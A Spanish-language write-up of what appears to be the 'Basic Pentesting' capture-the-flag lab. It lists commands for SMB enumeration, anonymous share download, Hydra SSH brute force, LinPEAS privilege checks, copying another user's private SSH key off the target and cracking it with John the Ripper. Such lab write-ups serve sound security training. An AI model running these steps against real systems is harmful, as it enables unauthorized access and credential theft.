Basic Pentesting

NMAP

NMAP Scan

Encontramos un apache(8080) y un smb (445)

Apache (8080) and SMB (445) Apache (8080) and SMB (445)

Fuzzing

            gobuster dir -u http://10.10.254.164/ -w Desktop/common.txt -x php
        
Fuzzing Result

Encontramos 2 archivos

2 Files

Puedo ver que los desarrolladores se hablan por aquí

Developers Communication

SMB

Realizamos una búsqueda de recursos compartidos.

            smbmap -H 10.10.148.28
        
SMB Share Search

Listamos Anonymous

            smbmap -H 10.10.148.28 -r anonymous
        
List Anonymous

Nos conectamos como Anonymous y descargamos el fichero.

            smbclient //10.10.254.164/anonymous -N
        
smb: \> get staff.txt Download File

Dentro encontramos los nombres de usuario.

Usernames

Fuerza Bruta

            hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://10.10.254.164
        
Brute Force Result

SSH

Entramos con el usuario y contraseñas extraídos

SSH Access

LinPEAS

En caso de no tenerlo, clonamos el repositorio

            git clone https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS
        

Pasamos LinPEAS a la máquina

            scp linpeas.sh jan@10.10.254.164:/tmp
        
LinPEAS Transfer

Le damos permisos y lo ejecutamos

            chmod +x linpeas.sh
            ./linpeas.sh
        

Encontramos la clave SSH

LinPEAS Result

La pasamos a nuestro ordenador

            scp jan@10.10.254.164:/home/kay/.ssh/id_rsa /home/kali/Desktop
        
SSH Key

Pasamos el archivo a txt usando un script

Copy SSH Key

Lo rompemos usando JohnTheRipper

Convert to TXT

Clave Final

Entramos con la clave

JohnTheRipper Result

Aquí encontraremos la contraseña final

Final Password